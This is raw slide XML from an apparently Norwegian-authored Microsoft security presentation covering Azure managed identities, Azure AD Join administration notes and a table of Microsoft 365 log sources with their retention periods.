            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>subscriptionId</a:t>
            </a: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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>subscriptionName</a:t>
            </a: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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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name, </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>resourceGroup</a:t>
            </a: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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>identityType</a:t>
            </a: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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>hasManagedIdentity</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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CFD5E0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>isSystemAssignedEnable</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="1400" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="596174"/>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Bilde 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A9C74DDA-0577-4245-9AAE-CBFD31E46C33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5668499" y="984430"/>
            <a:ext cx="6084008" cy="4742114"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F466A8F9-F8F2-428D-BDE3-A17A0A827E16}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6479005" y="5745079"/>
            <a:ext cx="437949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800" b="0" i="0" u="sng" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Remember to turn on Azure AD Diagnostics logging</a:t>
            </a:r>
            <a:endPar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420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4D80DA-ECE0-4461-955E-6BD2D3B70227}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2051050" y="260875"/>
            <a:ext cx="955165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4000" b="1" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Managed Identities and Azure AD Join</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" sz="4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Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAC413AF-CB46-41C3-A839-24555265043F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="604584" y="1313172"/>
            <a:ext cx="4102437" cy="5010760"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Azure AD Join supported for Linux  and Windows (Server 2019 and later)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Virtual Machine Administrator or User logon access required to logon machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1"/>
              <a:t>Dsregcmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t> /status and /leave good commands to remember</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Remember to exclude “Azure Windows VM Sign-in” from Conditional Access</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="171717"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Supported by Azure Bastion via RDP/SSH with UPN: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nb-NO" sz="2000" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>AzureAD\john@contoso.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="nb-NO" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Bilde 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7A285E4-96D1-4BE0-877A-231034E8E08C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5007735" y="1386009"/>
            <a:ext cx="6281934" cy="2061039"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254824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B64E3-3110-4AD6-8FEC-4D6EF9BAB149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="657224" y="499533"/>
            <a:ext cx="10772775" cy="645267"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Microsoft Security, where to start? </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD789089-E7CB-42D0-A2FB-46925798007D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1260562" y="1144800"/>
            <a:ext cx="9566097" cy="5070305"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7877009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45793E-8E14-4A90-BE7D-52C4B0C20EF7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="nb-NO" sz="4000" b="1" dirty="0">
                <a:latin typeface="+mn-lt"/>
                <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Logs and log sources</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4CBE4946-22D8-491A-8833-5084998F8284}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="987353" y="1432322"/>
          <a:ext cx="10193232" cy="4745078"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1"/>
              <a:tblGrid>
                <a:gridCol w="2548308">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3680454339"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2548308">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="897638882"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2548308">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="898253443"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2548308">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2403709729"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="464380">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Audit log</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Category</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Enabled as standard</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Retention</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="bg1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="tx2"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1959681576"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="430293">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>User Activity</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microsoft 365 Security</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>90 Days (1 year for E5)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3910050608"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="430293">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Admin Activity</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Microsoft 365 Security</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>No</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>90 Days (1 year for E5)</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4238637081"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="430293">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Mailbox Audit</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Exchange Online</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Yes</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="140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400" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>90 Days</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="68580" marR="68580" marT="34290" marB="34290">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="351776732"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="430293">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="nb-NO" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Sign-In Activity</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1400" b="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r>
                        <a:rPr lang="nb-NO" sz="1400" b="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:cs typeface="Segoe UI Semibold" panose="020B0702040204020203" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Azure AD</a:t>
                      </a:r>
